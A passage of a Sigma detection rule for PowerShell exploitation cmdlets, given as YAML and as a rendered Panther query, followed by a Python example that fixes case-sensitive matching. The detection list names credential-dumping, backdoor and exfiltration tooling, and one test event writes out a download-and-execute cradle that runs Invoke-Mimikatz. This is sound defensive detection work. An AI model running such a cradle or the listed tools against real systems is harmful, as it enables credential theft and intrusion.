            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-DNSRecordArray'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-MachineAccount'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'Port-Scan'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-MachineAccount'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Set-MacAttribute'
            - 'Set-MachineAccountAttribute'
            - 'Set-Wallpaper'
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'Veeam-Get-Creds'
            - 'VolumeShadowCopyTools'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Malicious PowerShell Commandlets - ScriptBlock
Detects Commandlet names from well-known PowerShell exploitation frameworks
status test author Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer id 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
panther query
def rule(event):
    if all(
        [
            any(
                [
                    "Add-Exfiltration" in event.deep_get("ScriptBlockText", default=""),
                    "Add-Persistence" in event.deep_get("ScriptBlockText", default=""),
                    "Add-RegBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Add-RemoteRegBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Add-ScrnSaveBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "ConvertTo-Rc4ByteStream" in event.deep_get("ScriptBlockText", default=""),
                    "Decrypt-Hash" in event.deep_get("ScriptBlockText", default=""),
                    "Disable-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Do-Exfiltration" in event.deep_get("ScriptBlockText", default=""),
                    "Enable-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Enabled-DuplicateToken" in event.deep_get("ScriptBlockText", default=""),
                    "Exploit-Jboss" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRCSV" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRExcel" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRHTML" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRJSON" in event.deep_get("ScriptBlockText", default=""),
                    "Export-ADRXML" in event.deep_get("ScriptBlockText", default=""),
                    "Find-Fruit" in event.deep_get("ScriptBlockText", default=""),
                    "Find-GPOLocation" in event.deep_get("ScriptBlockText", default=""),
                    "Find-TrustedDocuments" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSNodeAttribute" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSNodeOwner" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSNodeTombstoned" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSPermission" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ADIDNSZone" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ChromeDump" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ClipboardContents" in event.deep_get("ScriptBlockText", default=""),
                    "Get-FoxDump" in event.deep_get("ScriptBlockText", default=""),
                    "Get-GPPPassword" in event.deep_get("ScriptBlockText", default=""),
                    "Get-IndexedItem" in event.deep_get("ScriptBlockText", default=""),
                    "Get-KerberosAESKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-Keystrokes" in event.deep_get("ScriptBlockText", default=""),
                    "Get-LSASecret" in event.deep_get("ScriptBlockText", default=""),
                    "Get-PassHashes" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RegAlwaysInstallElevated" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RegAutoLogon" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteBootKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteCachedCredential" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteLocalAccountHash" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteLSAKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteMachineAccountHash" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RemoteNLKMKey" in event.deep_get("ScriptBlockText", default=""),
                    "Get-RickAstley" in event.deep_get("ScriptBlockText", default=""),
                    "Get-SecurityPackages" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ServiceFilePermission" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ServicePermission" in event.deep_get("ScriptBlockText", default=""),
                    "Get-ServiceUnquoted" in event.deep_get("ScriptBlockText", default=""),
                    "Get-SiteListPassword" in event.deep_get("ScriptBlockText", default=""),
                    "Get-System" in event.deep_get("ScriptBlockText", default=""),
                    "Get-TimedScreenshot" in event.deep_get("ScriptBlockText", default=""),
                    "Get-UnattendedInstallFile" in event.deep_get("ScriptBlockText", default=""),
                    "Get-Unconstrained" in event.deep_get("ScriptBlockText", default=""),
                    "Get-USBKeystrokes" in event.deep_get("ScriptBlockText", default=""),
                    "Get-VaultCredential" in event.deep_get("ScriptBlockText", default=""),
                    "Get-VulnAutoRun" in event.deep_get("ScriptBlockText", default=""),
                    "Get-VulnSchTask" in event.deep_get("ScriptBlockText", default=""),
                    "Grant-ADIDNSPermission" in event.deep_get("ScriptBlockText", default=""),
                    "Gupt-Backdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ACLScanner" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ADRecon" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ADSBackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-AgentSmith" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-AllChecks" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ARPScan" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-AzureHound" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BackdoorLNK" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BadPotato" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BetterSafetyKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-BypassUAC" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Carbuncle" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Certify" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ConPtyShell" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-CredentialInjection" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DAFT" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DCSync" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DinvokeKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DllInjection" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DNSUpdate" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DNSExfiltrator" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DomainPasswordSpray" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-DowngradeAccount" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-EgressCheck" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Eyewitness" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-FakeLogonScreen" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Farmer" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Get-RBCD-Threaded" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Gopher" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Grouper" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-HandleKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ImpersonatedProcess" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ImpersonateSystem" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-InteractiveSystemPowerShell"
                    in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Internalmonologue" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Inveigh" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-InveighRelay" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-KrbRelay" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-LdapSignCheck" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Lockless" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-MalSCCM" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Mimikatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Mimikittenz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-MITM6" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-NanoDump" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-NetRipper" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Nightmare" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-NinjaCopy" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-OfficeScrape" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-OxidResolver" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-P0wnedshell" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Paranoia" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PortScan" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PoshRatHttp" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PostExfil" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerDump" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerDPAPI" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerShellTCP" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PowerShellWMI" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PPLDump" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PsExec" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PSInject" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-PsUaCme" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ReflectivePEInjection" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ReverseDNSLookup" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Rubeus" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-RunAs" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SafetyKatz" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SauronEye" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SCShell" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Seatbelt" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ServiceAbuse" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ShadowSpray" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Sharp" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Shellcode" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SMBScanner" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Snaffler" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Spoolsample" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SpraySinglePassword" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SSHCommand" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-StandIn" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-StickyNotesExtract" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-SystemCommand" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Tasksbackdoor" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Tater" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Thunderfox" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-ThunderStruck" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-TokenManipulation" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Tokenvator" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-TotalExec" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-UrbanBishop" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-UserHunter" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-VoiceTroll" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Whisker" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WinEnum" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-winPEAS" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WireTap" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WmiCommand" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WMIExec" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-WScriptBypassUAC" in event.deep_get("ScriptBlockText", default=""),
                    "Invoke-Zerologon" in event.deep_get("ScriptBlockText", default=""),
                    "MailRaider" in event.deep_get("ScriptBlockText", default=""),
                    "New-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "New-HoneyHash" in event.deep_get("ScriptBlockText", default=""),
                    "New-InMemoryModule" in event.deep_get("ScriptBlockText", default=""),
                    "New-SOASerialNumberArray" in event.deep_get("ScriptBlockText", default=""),
                    "Out-Minidump" in event.deep_get("ScriptBlockText", default=""),
                    "PowerBreach" in event.deep_get("ScriptBlockText", default=""),
                    "powercat " in event.deep_get("ScriptBlockText", default=""),
                    "PowerUp" in event.deep_get("ScriptBlockText", default=""),
                    "PowerView" in event.deep_get("ScriptBlockText", default=""),
                    "Remove-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Remove-Update" in event.deep_get("ScriptBlockText", default=""),
                    "Rename-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Revoke-ADIDNSPermission" in event.deep_get("ScriptBlockText", default=""),
                    "Set-ADIDNSNode" in event.deep_get("ScriptBlockText", default=""),
                    "Show-TargetScreen" in event.deep_get("ScriptBlockText", default=""),
                    "Start-CaptureServer" in event.deep_get("ScriptBlockText", default=""),
                    "Start-Dnscat2" in event.deep_get("ScriptBlockText", default=""),
                    "Start-WebcamRecorder" in event.deep_get("ScriptBlockText", default=""),
                    "VolumeShadowCopyTools" in event.deep_get("ScriptBlockText", default=""),
                ]
            ),
            not any(
                [
                    "Get-SystemDriveInfo" in event.deep_get("ScriptBlockText", default=""),
                    "C:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\"
                    in event.deep_get("ScriptBlockText", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious PowerShell Commandlets - ScriptBlock
id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6
related:
    - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c
      type: similar
    - id: 02030f2f-6199-49ec-b258-ea71b07e03dc
      type: similar
    - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf
      type: obsolete
    - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e
      type: obsolete
status: test
description: Detects Commandlet names from well-known PowerShell exploitation frameworks
references:
    - https://adsecurity.org/?p=2921
    - https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
    - https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1
    - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1
    - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1
    - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1
    - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec
    - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec
    - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare
    - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1
    - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
    - https://github.com/HarmJ0y/DAMP
    - https://github.com/samratashok/nishang
    - https://github.com/DarkCoderSc/PowerRunAsSystem/
    - https://github.com/besimorhino/powercat
    - https://github.com/Kevin-Robertson/Powermad
    - https://github.com/adrecon/ADRecon
    - https://github.com/adrecon/AzureADRecon
    - https://github.com/The-Viper-One/Invoke-PowerDPAPI/
    - https://github.com/Arno0x/DNSExfiltrator/
author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer
date: 2017-03-05
modified: 2025-12-10
tags:
    - attack.execution
    - attack.discovery
    - attack.t1482
    - attack.t1087
    - attack.t1087.001
    - attack.t1087.002
    - attack.t1069.001
    - attack.t1069.002
    - attack.t1069
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains:
            # Note: Please ensure alphabetical order when adding new entries
            - 'Add-Exfiltration'
            - 'Add-Persistence'
            - 'Add-RegBackdoor'
            - 'Add-RemoteRegBackdoor'
            - 'Add-ScrnSaveBackdoor'
            - 'ConvertTo-Rc4ByteStream'
            - 'Decrypt-Hash'
            - 'Disable-ADIDNSNode'
            - 'Do-Exfiltration'
            - 'Enable-ADIDNSNode'
            - 'Enabled-DuplicateToken'
            - 'Exploit-Jboss'
            - 'Export-ADRCSV'
            - 'Export-ADRExcel'
            - 'Export-ADRHTML'
            - 'Export-ADRJSON'
            - 'Export-ADRXML'
            - 'Find-Fruit'
            - 'Find-GPOLocation'
            - 'Find-TrustedDocuments'
            - 'Get-ADIDNSNodeAttribute'
            - 'Get-ADIDNSNodeOwner'
            - 'Get-ADIDNSNodeTombstoned'
            - 'Get-ADIDNSPermission'
            - 'Get-ADIDNSZone'
            - 'Get-ChromeDump'
            - 'Get-ClipboardContents'
            - 'Get-FoxDump'
            - 'Get-GPPPassword'
            - 'Get-IndexedItem'
            - 'Get-KerberosAESKey'
            - 'Get-Keystrokes'
            - 'Get-LSASecret'
            - 'Get-PassHashes'
            - 'Get-RegAlwaysInstallElevated'
            - 'Get-RegAutoLogon'
            - 'Get-RemoteBootKey'
            - 'Get-RemoteCachedCredential'
            - 'Get-RemoteLocalAccountHash'
            - 'Get-RemoteLSAKey'
            - 'Get-RemoteMachineAccountHash'
            - 'Get-RemoteNLKMKey'
            - 'Get-RickAstley'
            - 'Get-SecurityPackages'
            - 'Get-ServiceFilePermission'
            - 'Get-ServicePermission'
            - 'Get-ServiceUnquoted'
            - 'Get-SiteListPassword'
            - 'Get-System'
            - 'Get-TimedScreenshot'
            - 'Get-UnattendedInstallFile'
            - 'Get-Unconstrained'
            - 'Get-USBKeystrokes'
            - 'Get-VaultCredential'
            - 'Get-VulnAutoRun'
            - 'Get-VulnSchTask'
            - 'Grant-ADIDNSPermission'
            - 'Gupt-Backdoor'
            - 'Invoke-ACLScanner'
            - 'Invoke-ADRecon'
            - 'Invoke-ADSBackdoor'
            - 'Invoke-AgentSmith'
            - 'Invoke-AllChecks'
            - 'Invoke-ARPScan'
            - 'Invoke-AzureHound'
            - 'Invoke-BackdoorLNK'
            - 'Invoke-BadPotato'
            - 'Invoke-BetterSafetyKatz'
            - 'Invoke-BypassUAC'
            - 'Invoke-Carbuncle'
            - 'Invoke-Certify'
            - 'Invoke-ConPtyShell'
            - 'Invoke-CredentialInjection'
            - 'Invoke-DAFT'
            - 'Invoke-DCSync'
            - 'Invoke-DinvokeKatz'
            - 'Invoke-DllInjection'
            - 'Invoke-DNSUpdate'
            - 'Invoke-DNSExfiltrator'
            - 'Invoke-DomainPasswordSpray'
            - 'Invoke-DowngradeAccount'
            - 'Invoke-EgressCheck'
            - 'Invoke-Eyewitness'
            - 'Invoke-FakeLogonScreen'
            - 'Invoke-Farmer'
            - 'Invoke-Get-RBCD-Threaded'
            - 'Invoke-Gopher'
            - 'Invoke-Grouper' # Also Covers Invoke-GrouperX
            - 'Invoke-HandleKatz'
            - 'Invoke-ImpersonatedProcess'
            - 'Invoke-ImpersonateSystem'
            - 'Invoke-InteractiveSystemPowerShell'
            - 'Invoke-Internalmonologue'
            - 'Invoke-Inveigh'
            - 'Invoke-InveighRelay'
            - 'Invoke-KrbRelay'
            - 'Invoke-LdapSignCheck'
            - 'Invoke-Lockless'
            - 'Invoke-MalSCCM'
            - 'Invoke-Mimikatz'
            - 'Invoke-Mimikittenz'
            - 'Invoke-MITM6'
            - 'Invoke-NanoDump'
            - 'Invoke-NetRipper'
            - 'Invoke-Nightmare'
            - 'Invoke-NinjaCopy'
            - 'Invoke-OfficeScrape'
            - 'Invoke-OxidResolver'
            - 'Invoke-P0wnedshell'
            - 'Invoke-Paranoia'
            - 'Invoke-PortScan'
            - 'Invoke-PoshRatHttp' # Also Covers Invoke-PoshRatHttps
            - 'Invoke-PostExfil'
            - 'Invoke-PowerDump'
            - 'Invoke-PowerDPAPI'
            - 'Invoke-PowerShellTCP'
            - 'Invoke-PowerShellWMI'
            - 'Invoke-PPLDump'
            - 'Invoke-PsExec'
            - 'Invoke-PSInject'
            - 'Invoke-PsUaCme'
            - 'Invoke-ReflectivePEInjection'
            - 'Invoke-ReverseDNSLookup'
            - 'Invoke-Rubeus'
            - 'Invoke-RunAs'
            - 'Invoke-SafetyKatz'
            - 'Invoke-SauronEye'
            - 'Invoke-SCShell'
            - 'Invoke-Seatbelt'
            - 'Invoke-ServiceAbuse'
            - 'Invoke-ShadowSpray'
            - 'Invoke-Sharp' # Covers all "Invoke-Sharp" variants
            - 'Invoke-Shellcode'
            - 'Invoke-SMBScanner'
            - 'Invoke-Snaffler'
            - 'Invoke-Spoolsample'
            - 'Invoke-SpraySinglePassword'
            - 'Invoke-SSHCommand'
            - 'Invoke-StandIn'
            - 'Invoke-StickyNotesExtract'
            - 'Invoke-SystemCommand'
            - 'Invoke-Tasksbackdoor'
            - 'Invoke-Tater'
            - 'Invoke-Thunderfox'
            - 'Invoke-ThunderStruck'
            - 'Invoke-TokenManipulation'
            - 'Invoke-Tokenvator'
            - 'Invoke-TotalExec'
            - 'Invoke-UrbanBishop'
            - 'Invoke-UserHunter'
            - 'Invoke-VoiceTroll'
            - 'Invoke-Whisker'
            - 'Invoke-WinEnum'
            - 'Invoke-winPEAS'
            - 'Invoke-WireTap'
            - 'Invoke-WmiCommand'
            - 'Invoke-WMIExec'
            - 'Invoke-WScriptBypassUAC'
            - 'Invoke-Zerologon'
            - 'MailRaider'
            - 'New-ADIDNSNode'
            - 'New-HoneyHash'
            - 'New-InMemoryModule'
            - 'New-SOASerialNumberArray'
            - 'Out-Minidump'
            - 'PowerBreach'
            - 'powercat '
            - 'PowerUp'
            - 'PowerView'
            - 'Remove-ADIDNSNode'
            - 'Remove-Update'
            - 'Rename-ADIDNSNode'
            - 'Revoke-ADIDNSPermission'
            - 'Set-ADIDNSNode' # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner
            - 'Show-TargetScreen'
            - 'Start-CaptureServer'
            - 'Start-Dnscat2'
            - 'Start-WebcamRecorder'
            - 'VolumeShadowCopyTools'
            # - 'Check-VM'
            # - 'Disable-MachineAccount'
            # - 'Enable-MachineAccount'
            # - 'Get-ApplicationHost'
            # - 'Get-MachineAccountAttribute'
            # - 'Get-MachineAccountCreator'
            # - 'Get-Screenshot'
            # - 'HTTP-Login'
            # - 'Install-ServiceBinary'
            # - 'Install-SSP'
            # - 'New-DNSRecordArray'
            # - 'New-MachineAccount'
            # - 'Port-Scan'
            # - 'Remove-MachineAccount'
            # - 'Set-MacAttribute'
            # - 'Set-MachineAccountAttribute'
            # - 'Set-Wallpaper'
    filter_optional_amazon_ec2:
        ScriptBlockText|contains:
            - Get-SystemDriveInfo  # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1
            - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\  # false positive from Amazon EC2
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high
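One caveat a practitioner should check before pasting the rendered query: Sigma string modifiers such as `contains` and `endswith` are case-insensitive by default, but the machine-rendered Panther code above uses Python's `in` and `str.endswith`, which are case-sensitive, so `invoke-mimikatz -dumpcreds` would not trip it. The block below is an added example, not part of the Sigma rule or of Panther's generated code: it re-implements the `selection and not 1 of filter_optional_*` logic with Sigma's case semantics (the helper names `sigma_contains`, `sigma_endswith`, `rule_as_rendered`, `evaluate` and `rendering_gaps` are this example's own), uses a representative subset of the rule's cmdlet list, and runs both variants over constructed Script Block Logging events (Event ID 4104, `ScriptBlockText`). `sigma_endswith` shows the same case-folded treatment for the `TargetFilename|endswith` matching used by the FileCreation rule that follows.

```python
"""
Added example, not part of the Sigma rule or of Panther's rendered query:
"Malicious PowerShell Commandlets - ScriptBlock" with Sigma's default
case-insensitive string matching, run over constructed 4104 events.
"""
from __future__ import annotations

from typing import Any, Iterable, Mapping

# Representative subset of the rule's ScriptBlockText|contains list.
# The trailing space in 'powercat ' is intentional, as in the rule.
MALICIOUS_CMDLETS: tuple[str, ...] = (
    "Get-GPPPassword",
    "Invoke-DCSync",
    "Invoke-Mimikatz",
    "Invoke-Sharp",
    "PowerView",
    "powercat ",
)

# filter_optional_amazon_ec2 from the rule (applied as 'selection and not filter').
FILTER_SUBSTRINGS: tuple[str, ...] = (
    "Get-SystemDriveInfo",
    "C:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\",
)


def sigma_contains(value: str, needles: Iterable[str]) -> bool:
    """Sigma '|contains' with a list: case-insensitive, any needle matches."""
    folded = value.casefold()
    return any(n.casefold() in folded for n in needles)


def sigma_endswith(value: str, suffixes: Iterable[str]) -> bool:
    """Sigma '|endswith' with a list (TargetFilename matching in the
    FileCreation rule), also case-insensitive."""
    folded = value.casefold()
    return any(folded.endswith(s.casefold()) for s in suffixes)


def rule(event: Mapping[str, Any]) -> bool:
    """selection and not 1 of filter_optional_*, with Sigma case semantics."""
    text = str(event.get("ScriptBlockText", ""))
    if not sigma_contains(text, MALICIOUS_CMDLETS):
        return False
    return not sigma_contains(text, FILTER_SUBSTRINGS)


def rule_as_rendered(event: Mapping[str, Any]) -> bool:
    """What the pasted Panther query does: Python 'in' is case-sensitive,
    so a lower-cased cmdlet name slips past it."""
    text = str(event.get("ScriptBlockText", ""))
    hit = any(n in text for n in MALICIOUS_CMDLETS)
    filtered = any(f in text for f in FILTER_SUBSTRINGS)
    return hit and not filtered


# Constructed sample 4104 events (synthetic, not captured logs).
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"name": "download_cradle",
     "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString("
                        "'http://198.51.100.7/m.ps1'); Invoke-Mimikatz -DumpCreds"},
    {"name": "lowercased",
     "ScriptBlockText": "invoke-mimikatz -dumpcreds"},
    {"name": "ec2_launch_module",
     "ScriptBlockText": "Import-Module 'C:\\ProgramData\\Amazon\\EC2-Windows\\Launch"
                        "\\Module\\Ec2Launch.psd1'; Get-GPPPassword"},
    {"name": "benign_admin",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name, LastWriteTime"},
]


def evaluate(events: Iterable[Mapping[str, Any]]) -> dict[str, bool]:
    """Run the rule over a batch of events; returns {event name: verdict}."""
    return {str(e["name"]): rule(e) for e in events}


def rendering_gaps(events: Iterable[Mapping[str, Any]]) -> list[str]:
    """Names of events the Sigma semantics flag but the rendered query misses."""
    return [str(e["name"]) for e in events if rule(e) and not rule_as_rendered(e)]


if __name__ == "__main__":
    for name, verdict in evaluate(SAMPLE_EVENTS).items():
        print(f"{name:20s} {'ALERT' if verdict else 'pass'}")
    print("missed by case-sensitive rendering:", rendering_gaps(SAMPLE_EVENTS))
```

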